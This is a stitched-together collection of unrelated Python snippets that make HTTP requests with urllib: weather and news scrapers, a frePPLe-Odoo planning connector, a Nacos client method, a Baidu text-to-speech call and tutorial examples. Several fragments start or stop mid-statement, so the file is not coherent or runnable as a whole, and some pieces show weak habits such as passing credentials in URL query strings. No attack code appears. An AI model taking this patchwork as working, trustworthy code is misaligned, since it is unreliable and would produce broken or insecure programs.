        tomorrowAState1 = tomorrowCheck[1].find('div', {'class': 'info_data'})
        tomorrowAState2 = tomorrowAState1.find('ul', {'class': 'info_list'})
        tomorrowAState3 = tomorrowAState2.find('p', {'class': 'cast_txt'}).text
        tomorrowAState4 = tomorrowAState2.find('div', {'class': 'detail_box'})
        tomorrowAState5 = tomorrowAState4.find('span').text.strip()
        tomorrowAState = tomorrowAState3 + " " + tomorrowAState5

        text_Temp = '내일 ' + location + ' 오전 기온은 ' + tomorrowMoring + '도' + \
            ', 오후 기온은 ' + tomorrowAfter + '도 입니다'
        return text_Temp
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
    import frepple

    # Uncomment the following lines to bypass the connection to odoo and use
    # an XML flat file alternative. This can be useful for debugging.
    # with open("my_path/my_data_file.xml", 'rb') as f:
    #     frepple.readXMLdata(f.read().decode('utf-8'), False, False)
    #     frepple.printsize()
    #     return

    odoo_user = Parameter.getValue("odoo.user", database)
    odoo_password = settings.ODOO_PASSWORDS.get(database, None)
    if not odoo_password:
        odoo_password = Parameter.getValue("odoo.password", database)
    odoo_db = Parameter.getValue("odoo.db", database)
    odoo_url = Parameter.getValue("odoo.url", database)
    odoo_company = Parameter.getValue("odoo.company", database)
    ok = True

    # Set debugFile to the path of an XML file if you want frePPLe to read
    # that file rather than the data at the odoo URL; otherwise leave it False.
    debugFile = False  # "c:/temp/frepple_data.xml"

    if not odoo_user and not debugFile:
        logger.error("Missing or invalid parameter odoo.user")
        ok = False
    if not odoo_password and not debugFile:
        logger.error("Missing or invalid parameter odoo.password")
        ok = False
    if not odoo_db and not debugFile:
        logger.error("Missing or invalid parameter odoo.db")
        ok = False
    if not odoo_url and not debugFile:
        logger.error("Missing or invalid parameter odoo.url")
        ok = False
    if not odoo_company and not debugFile:
        logger.error("Missing or invalid parameter odoo.company")
        ok = False
    odoo_language = Parameter.getValue("odoo.language", database, "en_US")
    if not ok and not debugFile:
        raise Exception("Odoo connector not configured correctly")

    # Remember the single root of each hierarchy
    root_item = None
    for r in frepple.items():
        if r.owner is None:
            root_item = r
            break
    root_customer = None
    for r in frepple.customers():
        if r.owner is None:
            root_customer = r
            break
    root_location = None
    for r in frepple.locations():
        if r.owner is None:
            root_location = r
            break

    # Connect to the odoo URL to GET data
    try:
        loglevel = int(Parameter.getValue("odoo.loglevel", database, "0"))
    except Exception:
        loglevel = 0

    if not debugFile:
        url = "%sfrepple/xml?%s" % (
            odoo_url,
            urlencode({
                "database": odoo_db,
                "language": odoo_language,
                "company": odoo_company,
                "mode": cls.mode,
            }),
        )
        request = Request(url)
        # base64.encodestring() was removed in Python 3.9; b64encode() adds
        # no trailing newline, so the old "[:-1]" slice is not needed.
        encoded = base64.b64encode(
            ("%s:%s" % (odoo_user, odoo_password)).encode("utf-8"))
        request.add_header("Authorization", "Basic %s" % encoded.decode("ascii"))
        try:
            # Download and parse XML data. HTTPError is raised by urlopen(),
            # not by the Request constructor, so the call must sit in the try.
            with urlopen(request) as f:
                frepple.readXMLdata(f.read().decode("utf-8"), False, False,
                                    loglevel)
        except HTTPError as e:
            logger.error("Error connecting to odoo at %s: %s" % (url, e))
            raise e
    else:
        # Download and parse XML data
        with open(debugFile) as f:
            frepple.readXMLdata(f.read(), False, False, loglevel)

    # Assure single-root hierarchies
    for r in frepple.items():
        if r.owner is None and r != root_item:
            r.owner = root_item
    for r in frepple.customers():
        if r.owner is None and r != root_customer:
            r.owner = root_customer
    for r in frepple.locations():
        if r.owner is None and r != root_location:
            r.owner = root_location
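# The import above builds its Authorization header by hand. A standalone
# sketch of that pattern with base64.b64encode(), the replacement for the
# encodestring() call removed in Python 3.9 (user and password here are
# placeholders):
import base64
from urllib.request import Request


def basic_auth_request(url, user, password):
    token = base64.b64encode(("%s:%s" % (user, password)).encode("utf-8"))
    req = Request(url)
    req.add_header("Authorization", "Basic %s" % token.decode("ascii"))
    return req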
def _do_sync_req(self, url, headers=None, params=None, data=None,
                 timeout=None, method="GET"):
    if self.username and self.password:
        if not params:
            params = {}
        params.update({"username": self.username, "password": self.password})
    url = "?".join([url, urlencode(params)]) if params else url
    all_headers = self._get_common_headers(params, data)
    if headers:
        all_headers.update(headers)
    logger.debug(
        "[do-sync-req] url:%s, headers:%s, params:%s, data:%s, timeout:%s"
        % (url, all_headers, params, data, timeout))
    tries = 0
    while True:
        try:
            server_info = self.get_server()
            if not server_info:
                logger.error("[do-sync-req] cannot get a server.")
                raise NacosRequestException("Server is not available.")
            address, port = server_info
            server = ":".join([address, str(port)])
            server_url = "%s://%s" % ("http", server)
            if python_version_bellow("3"):
                req = Request(
                    url=server_url + url,
                    data=urlencode(data).encode() if data else None,
                    headers=all_headers)
                req.get_method = lambda: method
            else:
                req = Request(
                    url=server_url + url,
                    data=urlencode(data).encode() if data else None,
                    headers=all_headers,
                    method=method)
            # build a new opener with the proxy setting so that the HTTP
            # request goes through the proxy
            if self.proxies:
                proxy_support = ProxyHandler(self.proxies)
                opener = build_opener(proxy_support)
                resp = opener.open(req, timeout=timeout)
            else:
                # for python version compatibility
                if python_version_bellow("2.7.9"):
                    resp = urlopen(req, timeout=timeout)
                else:
                    resp = urlopen(req, timeout=timeout, context=None)
            logger.debug("[do-sync-req] info from server:%s" % server)
            return resp
        except HTTPError as e:
            if e.code in [
                    HTTPStatus.INTERNAL_SERVER_ERROR, HTTPStatus.BAD_GATEWAY,
                    HTTPStatus.SERVICE_UNAVAILABLE
            ]:
                logger.warning(
                    "[do-sync-req] server:%s is not available for reason:%s"
                    % (server, e.msg))
            else:
                raise
        except socket.timeout:
            logger.warning("[do-sync-req] %s request timeout" % server)
        except URLError as e:
            logger.warning("[do-sync-req] %s connection error:%s"
                           % (server, e.reason))

        tries += 1
        if tries >= len(self.server_list):
            logger.error(
                "[do-sync-req] %s maybe down, no server is currently available"
                % server)
            raise NacosRequestException("No server is available")
        self.change_server()
        logger.warning("[do-sync-req] %s maybe down, skip to next" % server)
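# A sketch of the proxy branch above in isolation: build_opener() with a
# ProxyHandler routes requests through the configured proxy instead of the
# default opener. The proxy address is a made-up placeholder.
from urllib.request import ProxyHandler, Request, build_opener

proxies = {"http": "http://127.0.0.1:8888"}  # hypothetical local proxy
opener = build_opener(ProxyHandler(proxies))
req = Request("http://example.com")
# resp = opener.open(req, timeout=5)  # needs a reachable proxy to succeed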
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
from urllib.request import Request, urlopen
from urllib.parse import urlencode

url = 'http://httpbin.org/post'
headers = {
    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
    'Host': 'httpbin.org'
}
form = {'name': 'TonyXu'}  # avoid the name "dict": it shadows the builtin
data = bytes(urlencode(form), encoding='utf8')

if __name__ == '__main__':
    req = Request(url, data=data, headers=headers, method='POST')
    res = urlopen(req)
    print(res.read().decode('utf-8'))
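# For comparison, the same endpoint via GET: leaving data=None makes the
# Request default to GET, and the form values travel in the query string
# instead of the request body.
from urllib.request import Request, urlopen
from urllib.parse import urlencode

if __name__ == '__main__':
    query = urlencode({'name': 'TonyXu'})
    req = Request('http://httpbin.org/get?' + query,
                  headers={'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'})
    res = urlopen(req)
    print(res.read().decode('utf-8'))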
        article_text))

# filter to remove the byline, timestamp and updated paragraphs from the block text
# when accessing a politico states article
def validate_state_paragraphs(class_name):
    excluded_classes = ['byline', 'timestamp', 'updated']
    if class_name in excluded_classes:
        return False
    return True

# validation performed to ensure the user entered the correct url;
# dots are escaped and "(www\.)?" used so e.g. "politicoXcom" will not match
if re.match(r'https://(www\.)?politico\.com/.+', url) is None:
    print('please enter a valid link to a politico article')
elif re.match(r'https://(www\.)?politico\.com/video(.*)', url) is not None:
    print('sorry. I do not scrape politico video links')
elif re.match(r'https://(www\.)?politico\.com/newsletters(.*)', url) is not None:
    print('sorry. I do not scrape politico newsletter links')
else:
    try:
        req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        html = urlopen(req).read().decode('utf-8')
        soup = BeautifulSoup(html, 'html.parser')
        parse_text(soup)
    except Exception as e:  # a bare except would also swallow KeyboardInterrupt
        print('there was a problem scraping the data:', e)
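# A sketch of the same validation with urllib.parse instead of regexes.
# The excluded path prefixes mirror the checks above; treating every other
# path as scrapable is an assumption about the site's layout.
from urllib.parse import urlparse


def is_scrapable_politico_url(url):
    parts = urlparse(url)
    if parts.scheme != 'https':
        return False
    if parts.netloc not in ('politico.com', 'www.politico.com'):
        return False
    first_segment = parts.path.lstrip('/').split('/', 1)[0]
    return first_segment not in ('video', 'newsletters')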
    'tok': token,
    'tex': tex,
    'per': PER,
    'spd': SPD,
    'pit': PIT,
    'vol': VOL,
    'aue': AUE,
    'cuid': CUID,
    'lan': 'zh',
    'ctp': 1
}  # 'lan' and 'ctp' are fixed parameters

data = urlencode(params)
print('test on Web Browser: ' + TTS_URL + '?' + data)

req = Request(TTS_URL, data.encode('utf-8'))
has_error = False
try:
    f = urlopen(req)
    result_str = f.read()
    # an audio/* Content-Type means success; anything else is an error payload
    has_error = ('Content-Type' not in f.headers.keys()
                 or f.headers['Content-Type'].find('audio/') < 0)
except HTTPError as err:  # URLError has no .code or .read(); HTTPError does
    print('tts http response http code : ' + str(err.code))
    result_str = err.read()
    has_error = True

save_file = "error.txt" if has_error else 'result.' + FORMAT
with open(save_file, 'wb') as of:
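# The has_error probe above keys off the Content-Type header: the TTS
# endpoint answers audio/* on success and a JSON error document otherwise.
# A standalone sketch of that check, applied to any urlopen() result:
def is_audio_response(resp):
    ctype = resp.headers.get('Content-Type', '')
    return ctype.startswith('audio/')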
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
    import frepple

    odoo_user = Parameter.getValue("odoo.user", database)
    odoo_password = settings.ODOO_PASSWORDS.get(database, None)
    if not odoo_password:
        odoo_password = Parameter.getValue("odoo.password", database)
    odoo_db = Parameter.getValue("odoo.db", database)
    odoo_url = Parameter.getValue("odoo.url", database)
    odoo_company = Parameter.getValue("odoo.company", database)
    ok = True
    if not odoo_user:
        logger.error("Missing or invalid parameter odoo.user")
        ok = False
    if not odoo_password:
        logger.error("Missing or invalid parameter odoo.password")
        ok = False
    if not odoo_db:
        logger.error("Missing or invalid parameter odoo.db")
        ok = False
    if not odoo_url:
        logger.error("Missing or invalid parameter odoo.url")
        ok = False
    if not odoo_company:
        logger.error("Missing or invalid parameter odoo.company")
        ok = False
    odoo_language = Parameter.getValue("odoo.language", database, "en_US")
    if not ok:
        raise Exception("Odoo connector not configured correctly")
    boundary = email.generator._make_boundary()

    # Generator function.
    # We generate output in the multipart/form-data format: the connection
    # parameters as form fields, plus a file with the planning results in
    # XML format.
    # TODO respect the parameters odoo.filter_export_purchase_order,
    # odoo.filter_export_manufacturing_order, odoo.filter_export_distribution_order.
    # These are python expressions - attack-sensitive evaluation!
    def publishPlan(cls):
        yield "--%s\r" % boundary
        yield 'Content-Disposition: form-data; name="webtoken"\r'
        yield "\r"
        yield "%s\r" % jwt.encode(
            {"exp": round(time.time()) + 600, "user": odoo_user},
            settings.DATABASES[database].get("SECRET_WEBTOKEN_KEY",
                                             settings.SECRET_KEY),
            algorithm="HS256",
        ).decode("ascii")  # PyJWT 1.x returns bytes; 2.x already returns str
        yield "--%s\r" % boundary
        yield 'Content-Disposition: form-data; name="database"\r'
        yield "\r"
        yield "%s\r" % odoo_db
        yield "--%s\r" % boundary
        yield 'Content-Disposition: form-data; name="language"\r'
        yield "\r"
        yield "%s\r" % odoo_language
        yield "--%s\r" % boundary
        yield 'Content-Disposition: form-data; name="company"\r'
        yield "\r"
        yield "%s\r" % odoo_company
        yield "--%s\r" % boundary
        yield 'Content-Disposition: file; name="frePPLe plan"; filename="frepple_plan.xml"\r'
        yield "Content-Type: application/xml\r"
        yield "\r"
        yield '<?xml version="1.0" encoding="UTF-8" ?>'
        yield '<plan xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
        # Export relevant operationplans
        yield "<operationplans>"
        for i in frepple.operationplans():
            if i.ordertype == "PO":
                if (not i.item or not i.item.source
                        or not i.item.source.startswith("odoo")
                        or i.status not in ("proposed", "approved")):
                    continue
                cls.exported.append(i)
                yield '<operationplan id="%s" ordertype="PO" item=%s location=%s supplier=%s start="%s" end="%s" quantity="%s" location_id=%s item_id=%s criticality="%d"/>' % (
                    i.id,
                    quoteattr(i.item.name),
                    quoteattr(i.location.name),
                    quoteattr(i.supplier.name),
                    i.start,
                    i.end,
                    i.quantity,
                    quoteattr(i.location.subcategory),
                    quoteattr(i.item.subcategory),
                    int(i.criticality),
                )
            elif i.ordertype == "MO":
                if (not i.operation or not i.operation.source
                        or not i.operation.item
                        or not i.operation.source.startswith("odoo")
                        or i.status not in ("proposed", "approved")):
                    continue
                cls.exported.append(i)
                res = set()
                try:
                    for j in i.loadplans:
                        res.add(j.resource.name)
                except Exception:
                    pass
                demand = {}
                demand_str = ""
                for d in i.pegging_demand:
                    demand[d.demand] = d.quantity
                    demand_str += "%s:%s, " % (d.demand, d.quantity)
                if demand_str:
                    demand_str = demand_str[:-2]
                yield '<operationplan id="%s" ordertype="MO" item=%s location=%s operation=%s start="%s" end="%s" quantity="%s" location_id=%s item_id=%s criticality="%d" resource=%s demand=%s/>' % (
                    i.id,
                    quoteattr(i.operation.item.name),
                    quoteattr(i.operation.location.name),
                    quoteattr(i.operation.name),
                    i.start,
                    i.end,
                    i.quantity,
                    quoteattr(i.operation.location.subcategory),
                    quoteattr(i.operation.item.subcategory),
                    int(i.criticality),
                    quoteattr(",".join(res)),
                    quoteattr(demand_str),
                )
        yield "</operationplans>"
        yield "</plan>"
        yield "--%s--\r" % boundary
        yield "\r"

    # Connect to the odoo URL to POST data
    try:
        cls.exported = []
        body = "\n".join(publishPlan(cls)).encode("utf-8")
        size = len(body)
        # base64.encodestring() was removed in Python 3.9; b64encode() adds
        # no trailing newline, so the old "[:-1]" slice is not needed.
        encoded = base64.b64encode(
            ("%s:%s" % (odoo_user, odoo_password)).encode("utf-8"))
        req = Request(
            "%sfrepple/xml/" % odoo_url,
            data=body,
            headers={
                "Authorization": "Basic %s" % encoded.decode("ascii"),
                "Content-Type": "multipart/form-data; boundary=%s" % boundary,
                "Content-length": size,
            },
        )
        # Posting the data and displaying the server response
        logger.info("Uploading %d bytes of planning results to odoo" % size)
        with urlopen(req) as f:
            msg = f.read()
            logger.info("Odoo response: %s" % msg.decode("utf-8"))
        # Mark the exported operations as approved
        for i in cls.exported:
            i.status = "approved"
        del cls.exported
    except HTTPError as e:
        logger.error("Error connecting to odoo %s" % e.read())
def get_ukmet_forecast(stid, ukmet_code, forecast_date):
    """
    Retrieve UKMET data.

    :param stid: station ID
    :param ukmet_code: site-specific URL code from ukmet.codes
    :param forecast_date: datetime of day to forecast
    :return: Forecast object for high, low, max wind for next 6Z--6Z. No precip.
    """
    # Retrieve the model data
    url = 'https://www.metoffice.gov.uk/public/weather/forecast/%s' % ukmet_code
    req = Request(url, headers=hdr)
    response = urlopen(req)
    page = response.read().decode('utf-8', 'ignore')
    soup = BeautifulSoup(page, 'lxml')

    # Find UTC offset and current time in HTML
    utcoffset = int(soup.find(id='country').text.split('-')[1][0:2])
    epoch = float(soup.find("td", {"id": "firstTimeStep"})['data-epoch'])
    utcnow = datetime.utcfromtimestamp(epoch)

    # Store daily variables
    days = []
    highs = []  # this can be overwritten by hourly
    lows = []  # this can be overwritten by hourly
    winds = []  # this comes from hourly

    # Pull in daily data using li tabs
    tabids = ['tabDay1', 'tabDay2', 'tabDay3']
    for ids in tabids:
        pars = soup.find(id=ids)
        days.append(datetime.strptime(pars['data-date'], '%Y-%m-%d'))
        highs.append(
            c_to_f(
                pars.findAll("span", {"title": "Maximum daytime temperature"
                                      })[0]['data-value-raw']))
        lows.append(
            c_to_f(
                pars.findAll("span", {"title": "Minimum nighttime temperature"
                                      })[0]['data-value-raw']))

    # Pull in hourly data
    # This requires PhantomJS to pull out additional HTML code
    driver = webdriver.PhantomJS(
        executable_path='/home/disk/p/wxchallenge/bin/phantomjs')
    driver.get(url + '#?date=2017-09-21')
    source = driver.page_source
    soup = BeautifulSoup(source, 'html.parser')

    dateTime = []
    temperature = []
    temperature_c = []
    dewpoint = []
    windSpeed = []
    windGust = []
    windDirection = []
    humidity = []  # this is temporary--converted to dew point below

    divids = [
        'divDayModule0', 'divDayModule1', 'divDayModule2', 'divDayModule3'
    ]
    for i, divs in enumerate(divids):
        day0 = datetime.strptime(
            soup.find("div", {"id": "divDayModule0"})['data-content-id'],
            '%Y-%m-%d')
        day1 = (day0 + timedelta(days=1)).strftime('%Y-%m-%d')
        pars = soup.find(id=divs)
        divdate = datetime.strptime(pars['data-content-id'], '%Y-%m-%d').date()
        hourels = pars.findAll("tr", {"class": "weatherTime"})[0].find_all('td')
        for ii, ele in enumerate(hourels):
            if ele.text == 'Now':
                dateTime.append(utcnow)
            else:
                dtmp = datetime(divdate.year, divdate.month, divdate.day,
                                int(ele.text.split(':')[0]),
                                int(ele.text.split(':')[1]))
                dateTime.append(dtmp + timedelta(hours=utcoffset))
        tempels = pars.findAll("tr", {"class": "weatherTemp"})[0].findAll(
            "i", {"class": "icon icon-animated"})
        for ele in tempels:
            temperature_c.append(float(ele['data-value-raw']))
            temperature.append(c_to_f(ele['data-value-raw']))
        # relative humidity for conversion to dew point
        humels = pars.findAll("tr", {"class": "weatherHumidity"})[0].text.split()
        for ele in humels:
            humidity.append(float(ele.split('%')[0]))
        # add wind
        speedels = pars.findAll("i", {"data-type": "windSpeed"})
        for ele in speedels:
            windSpeed.append(np.round(mph_to_kt(ele['data-value-raw']), 2))
        gustels = pars.findAll("span", {"class": "gust"})
        for ele in gustels:
            windGust.append(mph_to_kt(ele['data-value-raw']))
        direls = pars.findAll("span", {"class": "direction"})
        for ele in direls:
            windDirection.append(wind_dir_to_deg(ele.text))

    # Convert T and humidity to dewpt
    for ii, rh in enumerate(humidity):
        td_tmp = dewpoint_from_t_rh(temperature_c[ii], rh)
        dewpoint.append(c_to_f(td_tmp))

    # Make into dataframe
    df = pd.DataFrame(
        {
            'temperature': temperature,
            'dewpoint': dewpoint,
            'windSpeed': windSpeed,
            'windGust': windGust,
            'windDirection': windDirection,
            'dateTime': dateTime
        },
        index=dateTime)

    # Correct the highs and lows with the hourly data; find max wind speed
    forecast_start = forecast_date.replace(hour=6)
    forecast_end = forecast_start + timedelta(days=1)
    for d in range(0, len(days)):
        try:
            # unlike the mos code, we always use the 'include'
            iloc_start_include = df.index.get_loc(forecast_start)
        except Exception:
            print('ukmet: error getting start time index in db; check data.')
            break
        try:
            iloc_end = df.index.get_loc(forecast_end)
        except Exception:
            print('ukmet: error getting end time index in db; check data.')
            break
        raw_high = df.iloc[iloc_start_include:iloc_end]['temperature'].max()
        raw_low = df.iloc[iloc_start_include:iloc_end]['temperature'].min()
        winds.append(
            int(
                np.round(
                    df.iloc[iloc_start_include:iloc_end]['windSpeed'].max())))
        if raw_high > highs[d]:
            highs[d] = raw_high
        if raw_low < lows[d]:
            lows[d] = raw_low
        forecast_start = forecast_start + timedelta(days=1)
        forecast_end = forecast_end + timedelta(days=1)

    forecast = Forecast(stid, default_model_name, days[0])
    forecast.timeseries.data = df
    forecast.daily.set_values(highs[0], lows[0], winds[0], None)

    # # Make a list of forecast objects for future days--currently not implemented
    # forecast = []
    # for i in range(0, len(days)):
    #     forecast_tmp = Forecast(stid, default_model_name, days[i])
    #     forecast_tmp.daily.date = days[i]
    #     forecast_tmp.daily.high = highs[i]
    #     forecast_tmp.daily.low = lows[i]
    #     forecast.append(forecast_tmp)

    return forecast
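# The high/low correction above is a windowed aggregate over the hourly
# dataframe. With a DatetimeIndex the same window can be taken as a label
# slice; note that .loc slicing includes both endpoints, unlike the
# get_loc/iloc pair used above. Column names follow the dataframe built
# in get_ukmet_forecast().
import pandas as pd


def window_extremes(df, start, end):
    window = df.loc[start:end]
    return (window['temperature'].max(), window['temperature'].min(),
            window['windSpeed'].max())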
# print(xls['1700'].head()) # We can send http request for the html page using urllib or requests package # Performing HTTP requests in Python using urllib # Get requests to extract info from teach page # Import packages from urllib.request import urlopen, Request # Specify the url url = "http://www.datacamp.com/teach/documentation" # This packages the request: request request = Request(url) # Sends the request and catches the response: response response = urlopen(request) # Print the datatype of response print(type(response)) # <class 'http.client.HTTPResponse'> # Extract the response: html html = response.read() # Print html # print(html) # Be polite and close the response! response.close()
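# The same request with a context manager, which closes the response even
# if read() raises -- an alternative to calling response.close() by hand.
from urllib.request import Request, urlopen

with urlopen(Request("http://www.datacamp.com/teach/documentation")) as response:
    html = response.read()
print(len(html))  # number of bytes fetched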